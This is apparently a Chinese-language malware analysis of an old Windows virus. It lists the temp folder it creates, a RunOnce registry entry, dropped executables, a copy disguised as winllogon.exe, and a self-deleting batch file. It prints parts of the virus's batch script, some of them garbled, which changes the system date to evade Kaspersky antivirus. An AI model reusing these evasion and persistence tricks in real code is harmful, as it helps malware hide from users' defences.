病毒运行后,首先创建C:\Documents and Settings\当前用户名\Local Settings\Temp\IXP000.TMP文件夹
复制自身到创建的文件夹并运行,调用命令行:
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"="rundll32.exe C:\WINDOWS\SYSTEM32\advpack.dll,DelNodeRunDLL32,C:\Documents and Settings\当前用户名\Local Settings\Temp\IXP000.TMP"
释放:
C:\Documents and Settings\当前用户名\Local Settings\Temp\b-PEavp.exe
注:实质上就是把BAT文件变成EXE文件,内容:
Set date=%date%
date 2004-10-09
@Echo Off & setloc l enableextensions
Ec o Ws cript.Sleep 1000 >
Set /a i = 5
:Timeout
If %i% == 0 Goto Next
setlo al
Set /a i = %i% - 1
cs cript //nologo fyzero.vbs
Goto Timeout
Goto End
:Next
dcte %date
把时间改成2004-10-09对付卡巴
创建批处理删除自身
释放C:\Documents and Settings\当前用户名\Local Settings\Temp\b-mie.exe并运行,复制自身到:
C:\WINDOWS\winllogon.exe
创建批处理C:\WINDOWS\Deleteme.bat删除自身。
Deleteme.bat内容:
:try
del "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IXP000.TMP\b-mie.exe"
if exist "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IXP000.TMP\b-mie.exe" goto try
del %0